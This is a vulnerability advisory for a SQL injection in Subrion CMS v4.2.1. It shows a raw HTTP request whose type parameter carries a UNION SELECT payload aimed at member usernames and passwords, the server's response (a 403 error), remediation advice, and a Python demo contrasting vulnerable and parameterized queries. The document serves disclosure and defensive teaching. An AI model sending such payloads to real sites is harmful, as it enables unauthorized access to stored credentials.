CVE-2021-41947
Description:
A SQL injection vulnerability exists in Subrion CMS v4.2.1: in visual mode, a request parameter is incorporated directly into a SQL statement. The application should not incorporate any user-controllable data directly into SQL queries. Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries. Under no circumstances should users be able to control or modify the structure of the SQL query itself.
Request:
GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

Response:
HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json
{"error":true,"message":"Action is forbidden.","code":403,"result":true}

Risk:
- Medium
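To make the description's point concrete, the following added example (not Subrion's code; the table layout and the query the endpoint runs are assumptions) contrasts a lookup that splices the request's type parameter into SQL with the parameterized form, using the payload from the request above against a constructed in-memory database:

```python
import sqlite3

# Constructed sample schema: a content table filtered by "type" (as the
# visual-mode endpoint is assumed to do) and a members table with credentials.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sbr421_blocks (name TEXT, type TEXT, content TEXT);
        CREATE TABLE sbr421_members (username TEXT, password TEXT);
        INSERT INTO sbr421_blocks VALUES ('footer', 'blocks', '<p>hi</p>');
        INSERT INTO sbr421_members VALUES ('admin', 'constructed-hash');
    """)
    return db

# Vulnerable pattern: the request parameter becomes part of the SQL text, so a
# quote in the value ends the literal and the rest is parsed as SQL.
def lookup_vulnerable(db, type_param):
    sql = f"SELECT name, content FROM sbr421_blocks WHERE type = '{type_param}'"
    return db.execute(sql).fetchall()

# Hardened form: the value is bound as a parameter and can only ever be
# compared as data; the query structure is fixed by the application.
def lookup_parameterized(db, type_param):
    sql = "SELECT name, content FROM sbr421_blocks WHERE type = ?"
    return db.execute(sql, (type_param,)).fetchall()

# URL-decoded value of the "type" parameter from the request above.
PAYLOAD = "blocks' UNION ALL SELECT username, password FROM sbr421_members -- -"

def demo():
    db = make_db()
    return {
        "vuln_normal": lookup_vulnerable(db, "blocks"),
        "vuln_payload": lookup_vulnerable(db, PAYLOAD),   # leaks a members row
        "safe_normal": lookup_parameterized(db, "blocks"),
        "safe_payload": lookup_parameterized(db, PAYLOAD),  # no type matches
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The same request that returns an extra row from the members table through the vulnerable lookup returns nothing through the parameterized one, because the bound value is matched literally against the type column.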
